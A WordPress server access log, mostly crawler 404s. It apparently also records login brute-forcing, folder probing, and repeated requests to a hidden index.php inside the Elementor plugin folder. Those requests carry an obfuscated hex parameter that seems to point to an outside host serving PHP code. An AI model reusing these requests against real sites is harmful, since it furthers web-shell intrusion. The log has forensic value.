77.68.25.176 - - [22/Sep/2026:08:17:16 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383633362p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353033362q3936313136343465393165616139626237323139316531356533636637313330222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:18:38 +0000] "GET /item/K22597169.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:41 +0000] "GET /item/K52377060.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:46 +0000] "GET /item/K20307969.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:50 +0000] "GET /item/K50037388.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:52 +0000] "GET /item/K71202750.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:55 +0000] "GET /item/K81552807.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:17:37 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383635372p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353035372q3139356262363930393965356637333762626663653566393966333731303131222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:18:58 +0000] "GET /item/K80891343.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
102.90.109.1 - - [22/Sep/2026:08:19:01 +0000] "POST /wp-login.php HTTP/1.1" 302 5220 "https://localpubpassport.co.uk/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
216.73.216.40 - - [22/Sep/2026:08:19:01 +0000] "GET /item/K51442308.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:04 +0000] "GET /item/K52138180.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.38.115.161 - - [22/Sep/2026:08:19:09 +0000] "POST /wp-login.php HTTP/1.1" 302 5220 "https://localpubpassport.co.uk/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
216.73.216.40 - - [22/Sep/2026:08:19:10 +0000] "GET /item/K31727346.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:13 +0000] "GET /item/K80522631.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:16 +0000] "GET /item/K82679767.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:17:58 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383637382p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353037382q6631623730353735313963376265313265353238623834303963613033303138222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:19:19 +0000] "GET /item/K21532473.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:22 +0000] "GET /item/K51728148.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:25 +0000] "GET /item/K62402365.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:28 +0000] "GET /item/K70849942.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:31 +0000] "GET /item/K50605732.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:34 +0000] "GET /item/K31568330.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:37 +0000] "GET /item/K52296812.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:18:19 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383639392p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353039392q3964386430313338313533333762613661623762393163656537393963613138222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:19:40 +0000] "GET /item/K11607416.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:43 +0000] "GET /item/K50582156.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:46 +0000] "GET /item/K32102978.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:49 +0000] "GET /item/K51956868.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.220.32.136 - - [22/Sep/2026:08:19:51 +0000] "GET /wp-content/uploads/2022 HTTP/1.1" 404 38409 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
216.73.216.40 - - [22/Sep/2026:08:19:52 +0000] "GET /item/K70706118.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:55 +0000] "GET /item/K31172722.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:19:58 +0000] "GET /item/K52369444.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:18:40 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383732302p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353132302q6439666335303033643832373561313266313436633431653463336238303532222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:20:01 +0000] "GET /item/K11822048.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:04 +0000] "GET /item/K10672648.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:07 +0000] "GET /item/K51722764.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:10 +0000] "GET /item/K21952881.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:13 +0000] "GET /item/K82829895.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:16 +0000] "GET /item/K62072693.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:19 +0000] "GET /item/K82128143.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:19:01 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383734312p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353134312q3431313866623633343339616333353537363565386338636533633632326335222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:20:22 +0000] "GET /item/K31770842.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:25 +0000] "GET /item/K51382348.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:28 +0000] "GET /item/K81302407.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:31 +0000] "GET /item/K21287305.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:36 +0000] "GET /item/K70262478.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:39 +0000] "GET /item/K81330551.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:42 +0000] "GET /item/K41773851.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:19:22 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383736322p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353136322q3037366164333166393538663231666136633738333063616237356138396665222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:20:45 +0000] "GET /item/K82922391.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:48 +0000] "GET /item/K22417105.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:51 +0000] "GET /item/K32973130.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:54 +0000] "GET /item/K42069275.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:20:57 +0000] "GET /item/K61652405.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:00 +0000] "GET /item/K62986813.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:03 +0000] "GET /item/K80407031.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:19:43 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383738332p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353138332q6439326366393239663834326238633463616165363138636438303864386132222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:21:06 +0000] "GET /item/K72256838.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:09 +0000] "GET /item/K11604224.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:12 +0000] "GET /item/K11109624.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.220.32.136 - - [22/Sep/2026:08:21:15 +0000] "GET /wp-content/uploads/2022/01 HTTP/1.1" 404 38409 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
216.73.216.40 - - [22/Sep/2026:08:21:15 +0000] "GET /item/K22791273.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:18 +0000] "GET /item/K10573768.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:21 +0000] "GET /item/K30236626.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:24 +0000] "GET /item/K71610838.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:20:04 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383830342p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353230342q3462663665613062613266356664326438623032303837666439343138666263222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:21:27 +0000] "GET /item/K42102211.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:30 +0000] "GET /item/K82710703.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:33 +0000] "GET /item/K10368344.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:21:36 +0000] "GET /item/K40457811.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:20:25 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383832352p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353232352q3865393661336338666563396263363063373237343539343036626432646137222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:20:46 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383834362p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353234362q3863316265343966616238346665376634633433393137626562326466353263222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:21:07 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383836372p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353236372q3432363965666130306464613461383030363038666264363132396563306161222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:21:28 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383838382p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353238382q6666366539663932623365393838653734393630376134333835666563363962222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:21:50 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383931302p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353331302q3434373934333039356632386631663538636466386535616637626664616236222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:22:11 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383933312p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353333312q3466316266653937616464636132346135663665343835373962656439393562222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
